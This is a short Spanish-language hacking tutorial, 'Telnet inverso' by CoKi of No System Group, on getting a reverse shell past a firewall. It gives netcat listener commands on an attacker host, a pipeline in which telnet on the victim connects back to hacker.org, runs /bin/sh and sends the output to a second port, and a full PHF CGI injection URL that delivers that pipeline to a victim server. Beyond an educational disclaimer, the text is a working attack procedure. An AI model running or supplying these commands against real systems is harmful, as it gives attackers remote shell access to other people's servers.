TELNET INVERSO by CoKi
	~~~~~~~~~~~~~~~~~~~~~~


- Disclaimer
  ~~~~~~~~~~

La información incluída en este documento es expuesta en base a un interés educativo.
No me hago responsable del uso de dicha información.
El siguiente documento es propiedad de 'No System Group' y de su autor, pudiendo ser
distribuído de forma totalmente libre siempre y cuando se respete el formato original y
se cite a su fuente.


- Procedimiento
  ~~~~~~~~~~~~~

Bueno, esta técnica es utilizada en caso que tengamos la posibilidad de ejecutar código
arbitrario en el servidor víctima, y que por haber algun firewall de por medio, no
podamos abrir un shell en un puerto cualquiera, entonces lo que hacemos es shellearnos
a un puerto permitido, por ej. el 80.
Como bien sabemos, en UNIX se pueden usar metacaracteres para jugar con los stdout de
los comandos; por ejemplo cuando ejecutamos 'ls -l | grep html'
nos mostrara solo la salida del 'ls' que contenga ficheros en los que aparezca la frase
'html'.
Para llevar a cabo esta técnica vamos a utilizar una herramienta muy conocida y poderosa, el
'netcat', para poder activar puerto a la escucha en nuestro sistema.
Cómo usamos esto para obtener una shell??...de una manera muy simple, primero necesitamos
tener a la escucha dos puertos cualquiera en nuestro sistema, por ej.

En un terminal ejecutamos:

  root@hacker.org:~# nc -v -l -p 10
  listening on [any] 10 ...

Nos vamos a otro terminal:

  root@hacker.org:~# nc -v -l -p 20
  listening on [any] 20 ...

Bien, ahora nos vamos a nuestra víctima y ejecutamos el siguiente comando:
'telnet hacker.org 10 | /bin/sh | telnet hacker.org 20', esto puede hacerse a travez del
puerto 80, por ej, utilizando la vulnerabilidad del PHF, la cual es muy vieja y no creo que
encuentren alguien con este error, pero solo la cito en forma de ejemplo:

  root@hacker.org:~# lynx http://victima.org/cgi-bin/phf?Qalias=%0telnet%20hacker.org%2010%20|%20/bin/sh%20|%20telnet%20hacker.org%2020

Veamos como funciona, por ejemplo nos vamos al teminal donde esta el netcat conectado
victima.org en el puerto 10 y escribimos 'ls', el comando va a ser ejecutado por /bin/sh
de victima.org y mandada su salida por el telnet a hacker.org al puerto 20, donde veremos
su resultado en nuestro terminal. Es un poco incómodo, pero shell al fin...


Cualquier duda o comentario sobre este 'texto' escibanme a coki@interlap.com.ar

Muchas Gracias

CoKi
No System Group
http://www.nosystem.com.ar
Registered Linux User: #302168
<!-- www.000webhost.com Analytics Code -->
<script type="text/javascript" src="http://analytics.hosting24.com/count.php"></script>
<noscript><a href="http://www.hosting24.com/"><img src="http://analytics.hosting24.com/count.php" alt="web hosting" /></a></noscript>
<!-- End Of Analytics Code -->